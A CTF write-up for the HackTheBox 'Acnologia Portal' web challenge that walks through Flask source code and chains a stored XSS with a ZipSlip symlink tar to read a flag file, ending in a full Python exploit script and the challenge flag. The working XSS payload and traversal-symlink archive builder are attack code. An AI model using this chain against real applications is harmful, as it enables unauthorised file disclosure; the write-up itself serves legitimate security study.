Skip to main content

Command Palette

Search for a command to run...

B-XSS -> ZipSlip -> Local File Read

Updated
9 min read
B-XSS -> ZipSlip -> Local File Read
G
Hey there 👋 , I'm Godson, a dude who loves doing source-code reviews and web security 👨‍💻. I'm passionate about ensuring that web applications are secure 🔒 uncovering vulnerabilities 🐞 and keeping applications safe 🔐.

As usual, I got some time to play CTFs and decided to join my Team, TamilCTF, to play Cyber Apocalypse CTF 2022 (organized by HackTheBox). Let’s see a solution for one of the web challenges I solved during the event that I found interesting.

💡
Challenge Name: Acnologia Portal

Introduction

  • The following screenshot shows what the web app looks like:

  • We are provided with the source code, and the following screenshot shows the source code structure:

Report:

  • The following screenshot shows that the app has a reporting feature. It also has a bot. So, we need an XSS:

Source Code:

database.py (nothing super interesting — you can skip if you want)

from flask_sqlalchemy import SQLAlchemy
from sqlalchemy_serializer import SerializerMixin
from flask_login import UserMixin
from flask import current_app

db = SQLAlchemy()

class User(db.Model, UserMixin):
    """Account row: integer primary key, unique username, and a password column."""
    id = db.Column(db.Integer, primary_key=True)
    # unique=True: two accounts cannot share a username.
    username = db.Column(db.String(100), unique=True)
    # NOTE(review): the login route shown in this writeup compares this column
    # directly with the submitted password, so the value appears to be stored as-is.
    password = db.Column(db.String(100))

class Firmware(db.Model, UserMixin, SerializerMixin):
    """Firmware module row; SerializerMixin supplies the to_dict() used by the list API."""
    id = db.Column(db.Integer, primary_key=True)
    # All descriptive fields are free-form strings of up to 100 characters.
    module = db.Column(db.String(100))
    hw_version = db.Column(db.String(100))
    fw_version = db.Column(db.String(100))
    serial = db.Column(db.String(100))
    hub_id = db.Column(db.String(100))

class Report(db.Model, UserMixin, SerializerMixin):
    """Issue report submitted by a logged-in user against a firmware module."""
    id = db.Column(db.Integer, primary_key=True)
    # Plain integer; no foreign-key constraint to Firmware is declared here.
    module_id = db.Column(db.Integer)
    # Username of the submitting account (the report route passes current_user.username).
    reported_by = db.Column(db.String(100))
    # Free-form, user-supplied text.
    issue = db.Column(db.Text)

def clear_reports():
    """Delete every row of the Report table and commit the change."""
    session = db.session
    session.query(Report).delete()
    session.commit()

def clear_db():
    """Empty every table registered on the metadata, then commit once."""
    session = db.session
    # Walk metadata.sorted_tables backwards, issuing one DELETE per table.
    for table in reversed(db.metadata.sorted_tables):
        session.execute(table.delete())
    session.commit()

def migrate_db():
    """Reset the database to its seed state.

    Wipes all tables via clear_db(), then inserts the admin account taken
    from the app config and the ten fixed firmware rows, and commits.
    """
    clear_db()

    session = db.session
    config = current_app.config

    # admin user
    session.add(User(id=1, username=config['ADMIN_USERNAME'], password=config['ADMIN_PASSWORD']))

    # firmwares: (module, hw_version, fw_version, serial, hub_id); ids run 1..10 in this order
    seed_rows = (
        ('Launch pod interface', 'd3', '2408.b', 'c6c3b20e', '17310'),
        ('Oxidizer controller', 'a4', '1801.c', 'b20418fc', '33194'),
        ('Propellant damper', 'b6', '1705.e', '7fdee87d', '19696'),
        ('RD-983 compressor', 'a1', '0002.a', 'b0dae2e3', '91284'),
        ('Refinery interface', 'g4', '4323.d', 'd0f2798d', '31157'),
        ('Condensation chamber', 'k3', '3467.p', '2e1e7897', '19850'),
        ('Fission reactor', 'p3', '9031.g', '9c431d03', '12488'),
        ('Booster core', 'i7', '7651.g', 'cd003b79', '12488'),
        ('Surface calibrator', 'a1', '4632.g', 'b320babd', '14274'),
        ('Nozzle controller', 'f6', '8731.g', '8be939d9', '78804'),
    )
    for row_id, (module, hw_version, fw_version, serial, hub_id) in enumerate(seed_rows, start=1):
        session.add(Firmware(id=row_id, module=module, hw_version=hw_version,
                             fw_version=fw_version, serial=serial, hub_id=hub_id))

    session.commit()

routes.py

import json
from application.database import User, Firmware, Report, db, migrate_db
from application.util import is_admin, extract_firmware
from flask import Blueprint, jsonify, redirect, render_template, request
from flask_login import current_user, login_required, login_user, logout_user
from application.bot import visit_report

web = Blueprint('web', __name__)
api = Blueprint('api', __name__)

def response(message):
    """Wrap *message* in the ``{'message': ...}`` JSON envelope used by the API routes."""
    envelope = {'message': message}
    return jsonify(envelope)

@web.route('/', methods=['GET'])
def login():
    """Serve the login form at the site root."""
    template_name = 'login.html'
    return render_template(template_name)

@api.route('/login', methods=['POST'])
def user_login():
    """Authenticate a user from a JSON body carrying ``username`` and ``password``.

    Replies 401 when the body is not JSON or a field is missing/empty, 403
    when the credentials do not match, and logs the user in otherwise.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    username = payload.get('username', '')
    password = payload.get('password', '')

    if not (username and password):
        return response('Missing required parameters!'), 401

    account = User.query.filter_by(username=username).first()

    # Unknown user and wrong password deliberately share one reply.
    if not account or account.password != password:
        return response('Invalid username or password!'), 403

    login_user(account)
    return response('User authenticated successfully!')

@web.route('/register', methods=['GET'])
def register():
    """Serve the registration form."""
    template_name = 'register.html'
    return render_template(template_name)

@api.route('/register', methods=['POST'])
def user_registration():
    """Create an account from a JSON body carrying ``username`` and ``password``.

    Replies 401 when the body is not JSON, a field is missing/empty, or the
    username is already taken; otherwise stores the new user and confirms.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    username = payload.get('username', '')
    password = payload.get('password', '')

    if not (username and password):
        return response('Missing required parameters!'), 401

    existing = User.query.filter_by(username=username).first()
    if existing:
        return response('User already exists!'), 401

    db.session.add(User(username=username, password=password))
    db.session.commit()

    return response('User registered successfully!')

@web.route('/dashboard')
@login_required
def dashboard():
    """Serve the dashboard page to a logged-in user."""
    template_name = 'dashboard.html'
    return render_template(template_name)

@api.route('/firmware/list', methods=['GET'])
@login_required
def firmware_list():
    """Return every firmware row as a JSON array of dicts."""
    serialized = []
    for entry in Firmware.query.all():
        serialized.append(entry.to_dict())
    return jsonify(serialized)

@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
    """Store a user-submitted report, have the bot review it, then reset the database.

    Expects a JSON body with ``module_id`` and ``issue``; replies 401 when
    the body is not JSON or either field is missing/empty.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    module_id = payload.get('module_id', '')
    issue = payload.get('issue', '')

    if not (module_id and issue):
        return response('Missing required parameters!'), 401

    submitted = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
    db.session.add(submitted)
    db.session.commit()

    # Order matters: the bot must visit the report before the reset wipes it.
    visit_report()
    migrate_db()

    return response('Issue reported successfully!')

@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
    """Accept an admin's multipart upload under the ``file`` field and extract it.

    Replies 401 when the field is absent and 403 when extraction reports failure.
    """
    uploads = request.files
    if 'file' not in uploads:
        return response('Missing required parameters!'), 401

    if extract_firmware(uploads['file']):
        return response('Firmware update initialized successfully.')

    return response('Something went wrong, please try again!'), 403

@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
    """Render every stored report on the admin review page."""
    all_reports = Report.query.all()
    return render_template('review.html', reports=all_reports)

@web.route('/logout')
@login_required
def logout():
    """End the current session and send the browser back to the login page."""
    logout_user()
    landing = '/'
    return redirect(landing)
  • The @login_required middleware checks if the user is authenticated.

  • The @is_admin middleware checks if the user is an administrator. The following snippet shows the @is_admin middleware function code. Note that the check covers only the username and the IP address: it checks that the username equals the admin’s username configured in the app, and that the request’s IP address is 127.0.0.1.

def is_admin(f):
    """Decorator that runs the view only for the configured admin connecting from 127.0.0.1.

    Any other caller is rejected with ``abort(401)``.
    """
    @functools.wraps(f)
    def wrap(*args, **kwargs):
        # Check 1: the logged-in username must match the configured admin name.
        if current_user.username != current_app.config['ADMIN_USERNAME']:
            return abort(401)
        # Check 2: the request must originate from the loopback address.
        if request.remote_addr != '127.0.0.1':
            return abort(401)
        return f(*args, **kwargs)

    return wrap

Api Routes:

  • The /api/register route handles register user functionality:
@api.route('/register', methods=['POST'])
def user_registration():
    """Create an account from a JSON body carrying ``username`` and ``password``.

    Replies 401 when the body is not JSON, a field is missing/empty, or the
    username is already taken; otherwise stores the new user and confirms.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    username = payload.get('username', '')
    password = payload.get('password', '')

    if not (username and password):
        return response('Missing required parameters!'), 401

    existing = User.query.filter_by(username=username).first()
    if existing:
        return response('User already exists!'), 401

    db.session.add(User(username=username, password=password))
    db.session.commit()

    return response('User registered successfully!')

@web.route('/dashboard')
  • The /api/login route handles login functionality:
@api.route('/login', methods=['POST'])
def user_login():
    """Authenticate a user from a JSON body carrying ``username`` and ``password``.

    Replies 401 when the body is not JSON or a field is missing/empty, 403
    when the credentials do not match, and logs the user in otherwise.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    username = payload.get('username', '')
    password = payload.get('password', '')

    if not (username and password):
        return response('Missing required parameters!'), 401

    account = User.query.filter_by(username=username).first()

    # Unknown user and wrong password deliberately share one reply.
    if not account or account.password != password:
        return response('Invalid username or password!'), 403

    login_user(account)
    return response('User authenticated successfully!')
  • /api/firmware/report route handles the Report from user and saves it in the database.

  • visit_report() is the function that is called to make the bot view the submitted report.

  • migrate_db() is the function that resets the database: it wipes every table (including the submitted reports) and then re-creates the admin user and the default firmware entries.

@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
    """Store a user-submitted report, have the bot review it, then reset the database.

    Expects a JSON body with ``module_id`` and ``issue``; replies 401 when
    the body is not JSON or either field is missing/empty.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    module_id = payload.get('module_id', '')
    issue = payload.get('issue', '')

    if not (module_id and issue):
        return response('Missing required parameters!'), 401

    submitted = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
    db.session.add(submitted)
    db.session.commit()

    # Order matters: the bot must visit the report before the reset wipes it.
    visit_report()
    migrate_db()

    return response('Issue reported successfully!')
  • The following snippet shows that code handling the /api/firmware/upload route. This can be used to upload files. Note that both the @login_required and @is_admin are set — Meaning, only admin can upload files.
@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
    """Accept an admin's multipart upload under the ``file`` field and extract it.

    Replies 401 when the field is absent and 403 when extraction reports failure.
    """
    uploads = request.files
    if 'file' not in uploads:
        return response('Missing required parameters!'), 401

    if extract_firmware(uploads['file']):
        return response('Firmware update initialized successfully.')

    return response('Something went wrong, please try again!'), 403
  • The extract_firmware() function is called to extract the uploaded file, and the following snippet shows the code regarding this:
def extract_firmware(file):
    """Save an uploaded archive to the temp dir, unpack it, and move its files to the upload folder.

    Args:
        file: uploaded file object exposing ``filename`` and ``save(path)``.

    Returns:
        True when the saved upload is recognised as a tar archive and was
        processed, False otherwise.
    """
    tmp  = tempfile.gettempdir()
    # NOTE(review): the client-supplied filename is joined as-is, without sanitising.
    path = os.path.join(tmp, file.filename)
    file.save(path)

    if tarfile.is_tarfile(path):
        # NOTE(review): is_tarfile() also accepts non-gzip tars, which 'r:gz'
        # would then refuse to open -- confirm whether that case matters.
        tar = tarfile.open(path, 'r:gz')
        # NOTE(review): every member is extracted with no name or type checks, so
        # entries whose names contain '..' and symlink entries land wherever they
        # point (subject to the Python version's default extraction filter).
        tar.extractall(tmp)

        # generate() is defined elsewhere; presumably a random 15-character name -- TODO confirm.
        rand_dir = generate(15)
        extractdir = f"{current_app.config['UPLOAD_FOLDER']}/{rand_dir}"
        os.makedirs(extractdir, exist_ok=True)
        for tarinfo in tar:
            name = tarinfo.name
            # Only regular files are moved out of the temp dir into extractdir.
            if tarinfo.isreg():
                try:
                    filename = f'{extractdir}/{name}'
                    os.rename(os.path.join(tmp, name), filename)
                    continue
                except:
                    # Any failure of the move is swallowed; execution falls through to makedirs below.
                    pass
            # Non-regular entries (and failed moves) get a directory of that name
            # under extractdir; what extractall() already wrote is left untouched.
            os.makedirs(f'{extractdir}/{name}', exist_ok=True)
        tar.close()
        # The saved upload at `path` is not removed.
        return True

    return False
  • As observed, the uploaded file is first stored in /tmp, and the variable path holds the file’s full path. For example, if a file named myfile.tar.gz is uploaded, it will be stored as /tmp/myfile.tar.gz.
tmp  = tempfile.gettempdir()
path = os.path.join(tmp, file.filename)
file.save(path)
  • Before extracting the saved tar file, the code first checks whether it is a valid tar file, and if so, it unpacks it into /tmp, as shown in the following snippet:
if tarfile.is_tarfile(path):
        tar = tarfile.open(path, 'r:gz')
        tar.extractall(tmp)
  • Furthermore, the following snippet shows a loop that checks if the extracted files are normal files, or a different file like a symlink file.

  • If the extracted files are valid files, then the files are moved to the /app/application/static/firmware/[random_number] directory, which is the application’s static directory — Meaning, we can access the files in this directory from the web application. However, we need to know the value of the [random_number]. If we can leak the [random_number], then we can read files uploaded to the server.

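  • If an extracted entry is not a regular file (for example, a symlink or a directory), it is not moved to the /static directory; the loop only creates an empty directory with that entry’s name under the extraction directory, and whatever extractall() already wrote stays where it was extracted: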

for tarinfo in tar:
            name = tarinfo.name
            if tarinfo.isreg():
                try:
                    filename = f'{extractdir}/{name}'
                    os.rename(os.path.join(tmp, name), filename)
                    continue
                except:
                    pass
            os.makedirs(f'{extractdir}/{name}', exist_ok=True)
        tar.close()
  • The /review endpoint handles the GET method and renders the submitted reports in the page. Additionally, only the admin user can access this route, as shown in the following snippet:
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
    """Render every stored report on the admin review page."""
    all_reports = Report.query.all()
    return render_template('review.html', reports=all_reports)

Review.html

  • In Review.html, the user input is not sanitized before rendered. As a result, we have an XSS here!
 <div class="card-header"> Reported by : USER
        </div>
        <div class="card-body">
        <p class="card-title">Module ID : {{ report.module_id }}</p>
          <p class="card-text">Issue : {{ report.issue | safe }} </p>
          <a href="#" class="btn btn-primary">Reply</a>
          <a href="#" class="btn btn-danger">Delete</a>
        </div>

Exploit Idea:

  • Now we have an XSS. However, session cookies are set to HttpOnly, so we can’t use JavaScript to read them. We can still make use of the cookie without reading it, because the bot’s browser attaches it to any request our JavaScript sends to the application. Regardless, even if we were able to exfiltrate the session cookie, we couldn’t access the admin endpoints ourselves, since the source IP of the request must be 127.0.0.1.

  • With this blind XSS, we can force the bot user to upload a malicious tar file using the /api/firmware/upload endpoint.

  • There is a well-known vulnerability called ZipSlip, which allows us to pack files into a tar or zip archive with path-traversal names (such as ../), so that they are written outside the intended directory when the archive is unpacked.

  • We can create a symlink pointing to /flag.txt and use the ZipSlip vulnerability to make the extracted symlink land in the application’s static directory. Since the check that the files are regular files only happens for the files in the /tmp directory, where they are initially extracted, our traversed file will not be caught.

  • Note: Traversing the extracted file into the /app/application/static directory is what lets us bypass the tarinfo.isreg() check.

Exploit:

  • To automate this, I wrote a python script:
import requests
import os
import random
import string
import tarfile

# Alphabet for the throwaway account name.
letters = string.ascii_lowercase
# One random 10-letter token; main() uses it as both username and password.
randomText = ''.join([random.choice(letters) for _ in range(10)])
# Base URL of the target instance.
url = 'http://localhost:1337'

def registerUser(username, password):
    """Create an account on the target through ``POST /api/register``.

    Exits the script with a non-zero status, echoing the server's reply,
    when the server answers with anything other than HTTP 200.
    """
    r = requests.post(url + '/api/register', json={"username": username, "password": password})
    if r.status_code != 200:
        # SystemExit with a message prints it to stderr and exits with status 1;
        # the bare exit() used before reported success (status 0) on failure.
        raise SystemExit(r.text)

def loginUser(username, password):
    """Log in through ``POST /api/login`` and remember the session cookie.

    On success the module-level ``cookies`` dict is bound to
    ``{'session': <value>}`` for the later authenticated requests.
    Exits with a non-zero status when the login is rejected or when the
    response carries no ``session`` cookie.
    """
    global cookies

    r = requests.post(url + '/api/login', json={"username": username, "password": password})
    if r.status_code != 200:
        raise SystemExit(r.text)

    # Let requests parse Set-Cookie instead of splitting the raw header by hand,
    # which breaks on multiple cookies or on '=' inside the value.
    session = r.cookies.get('session')
    if session is None:
        raise SystemExit('Login succeeded but no session cookie was returned.')

    cookies = {
        'session': session
    }

    # Same follow-up request the script always made; its response is not inspected.
    requests.get(url + '/dashboard', cookies=cookies)

def makeTar():
    """Write ``exp.tar.gz`` containing a single path-traversing symlink entry.

    The archive holds one member named
    ``../app/application/static/getflag.txt`` that is a symlink to
    ``/flag.txt``. The member is built in memory, so nothing is created or
    deleted outside the current directory (the previous shell-based version
    made and then ``rm -rf``-ed ``../app``, which could destroy an existing
    directory of that name).
    """
    entry = tarfile.TarInfo('../app/application/static/getflag.txt')
    entry.type = tarfile.SYMTYPE
    entry.linkname = '/flag.txt'

    # 'w:gz' writes the gzip-compressed archive directly; no external gzip needed.
    with tarfile.open('exp.tar.gz', 'w:gz') as tar:
        tar.addfile(entry)

def js():
    """Build the XSS payload that makes the bot upload ``exp.tar.gz``.

    Reads ``exp.tar.gz`` from the current directory, embeds it base64-encoded
    in a ``<script>`` block that rebuilds the file as a Blob and POSTs it to
    the upload endpoint with the browser's credentials, then deletes the
    archive from disk.

    Returns:
        The payload string. For compatibility with report(), the module-level
        name ``js`` is also rebound to that string, so this function can only
        be called once per run.
    """
    import base64

    # NOTE: kept for backward compatibility -- report() reads the global `js`.
    global js

    # Encode in-process instead of piping through `cat | base64 -w0`, which
    # needs a shell and the GNU-only -w0 flag.
    with open('exp.tar.gz', 'rb') as archive:
        b64String = base64.b64encode(archive.read()).decode('ascii')
    os.remove('exp.tar.gz')

    js = """
        <script>
        function base64toBlob(base64Data, contentType) {
        contentType = contentType || '';
        var sliceSize = 1024;
        var byteCharacters = atob(base64Data);
        var bytesLength = byteCharacters.length;
        var slicesCount = Math.ceil(bytesLength / sliceSize);
        var byteArrays = new Array(slicesCount);

        for (var sliceIndex = 0; sliceIndex < slicesCount; ++sliceIndex) {
            var begin = sliceIndex * sliceSize;
            var end = Math.min(begin + sliceSize, bytesLength);

            var bytes = new Array(end - begin);
            for (var offset = begin, i = 0; offset < end; ++i, ++offset) {
                bytes[i] = byteCharacters[offset].charCodeAt(0);
            }
            byteArrays[sliceIndex] = new Uint8Array(bytes);
        }
        return new Blob(byteArrays, { type: contentType });
    }

    var b64file = """+f"'{b64String}'"+""";

    var content_type = 'application/x-gtar-compressed';
    var blob = base64toBlob(b64file, content_type);

    var formData = new FormData();
    formData.append('file', blob,'abcd');

    var url = 'http://localhost:1337/api/firmware/upload';
    var request = new XMLHttpRequest();
    request.withCredentials = true;
    request.open('POST', url);
    request.send(formData);
    </script>
    """
    return js

def report():
    """Submit the XSS payload as an issue report through ``POST /api/firmware/report``.

    Uses the module-level ``cookies`` set by loginUser() and the payload
    string stored in the module-level ``js`` by js(). Exits with a non-zero
    status when the payload has not been built yet or the server does not
    answer with HTTP 200.
    """
    if callable(js):
        # js() rebinds `js` to the payload string; while it is still the
        # function, we would send its repr instead of a payload.
        raise SystemExit('Payload not built: call js() before report().')

    r = requests.post(url + '/api/firmware/report', cookies=cookies, json={"module_id": "1", "issue": str(js)})
    if r.status_code != 200:
        # Exit with status 1 and the server reply; the bare exit() used before
        # reported success (status 0) on failure.
        raise SystemExit(r.text)

def getflag():
    """Fetch the planted symlink from the static directory, print it, and exit.

    The body of the response is printed either way; the exit status is 0
    only when the server actually served the file (HTTP 200).
    """
    r = requests.get(url + '/static/getflag.txt')
    print(r.text.strip())
    # Raise SystemExit directly instead of relying on the site-provided exit().
    raise SystemExit(0 if r.status_code == 200 else 1)

def main():
    """Run the chain: register, log in, build the archive, build the payload, report, fetch the flag."""
    # The same random token serves as username and password.
    account = (randomText, randomText)
    registerUser(*account)
    loginUser(*account)

    makeTar()
    js()
    report()
    getflag()

if __name__ == "__main__":
    main()
  • Running it, we get the flag, as shown in the following screenshot:

🚩
FLAG : HTB{des3r1aliz3_4ll_th3_th1ngs}